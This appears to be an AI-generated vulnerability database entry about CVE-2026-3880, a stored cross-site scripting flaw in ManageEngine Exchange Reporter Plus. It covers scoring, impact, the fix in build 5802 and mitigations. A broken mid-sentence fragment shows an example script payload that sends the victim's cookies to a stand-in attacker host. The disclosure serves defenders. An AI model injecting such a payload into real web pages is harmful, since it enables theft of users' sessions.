
Cloud Vulnerability DB
A community-led vulnerabilities database
CVE-2026-3880 is a Stored Cross-Site Scripting (XSS) vulnerability in Zohocorp ManageEngine Exchange Reporter Plus affecting all builds up to and including build 5801. The flaw exists in the Public Folder Client Permissions report within the Reports module, allowing an authenticated attacker with Exchange administrative privileges to inject malicious scripts that execute in the browsers of other users who view the affected report. The vulnerability was fixed on March 19, 2026, and publicly disclosed on April 3, 2026. It carries a CVSS v3.1 base score of 4.8 (Medium) per NVD, though the GitHub Advisory Database rates it 7.3 (High) using a slightly different vector (ManageEngine Advisory, GitHub Advisory).
The vulnerability is classified as CWE-79 (Improper Neutralization of Input During Web Page Generation — Cross-Site Scripting) and stems from insufficient input validation in the Public Folder Client Permissions report (ManageEngine Advisory). An attacker with Exchange administrative privileges within the Exchange organization can inject malicious JavaScript payloads into report data fields; these payloads are persistently stored and rendered without sanitization when any user views the affected report. The attack vector is network-based, requires low-to-high privileges (depending on scoring source), and requires victim user interaction (viewing the report) to trigger execution (GitHub Advisory). No public proof-of-concept exploit code has been identified.
Successful exploitation allows the injected script to execute in the security context of any user who views the contaminated Public Folder Client Permissions report, potentially enabling session token theft, credential harvesting, and unauthorized actions within Exchange Reporter Plus on behalf of the victim. The confidentiality and integrity of data accessible to the victim user are at risk, though availability is not directly impacted. If a high-privileged administrator views the report, the attacker could escalate their effective access within the application (ManageEngine Advisory, GitHub Advisory).
There is no evidence of active in-the-wild exploitation or a publicly available proof-of-concept at this time (GitHub Advisory). The EPSS score is approximately 0.019–0.024%, indicating a low near-term exploitation probability. The vulnerability is not listed in the CISA Known Exploited Vulnerabilities (KEV) catalog. Exploitation requires the attacker to already hold Exchange administrative privileges within the Exchange organization, which significantly limits the attacker pool.
<script>document.location='https://attacker.com/steal?c='+document.cookie</script>) into an input field associated with the Public Folder Client Permissions report data that is rendered without sanitization.Zohocorp has resolved this vulnerability in Exchange Reporter Plus build 5802, released on March 19, 2026, by implementing proper input validation (ManageEngine Advisory). Organizations should immediately upgrade all installations to build 5802 or later using the available service pack. As interim measures, restrict access to the Public Folder Client Permissions report to the minimum set of trusted users, deploy a web application firewall (WAF) with XSS detection rules, and monitor low-privilege accounts for suspicious report activity.
The vulnerability was reported to Zohocorp by security researcher C311 through the Zoho BugBounty program (ManageEngine Advisory). Broader community and media reaction has been limited, consistent with the moderate severity and lack of active exploitation.
Source: This report was generated using AI
Free Vulnerability Assessment
Evaluate your cloud security practices across 9 security domains to benchmark your risk level and identify gaps in your defenses.
Get a personalized demo
"Best User Experience I have ever seen, provides full visibility to cloud workloads."
"Wiz provides a single pane of glass to see what is going on in our cloud environments."
"We know that if Wiz identifies something as critical, it actually is."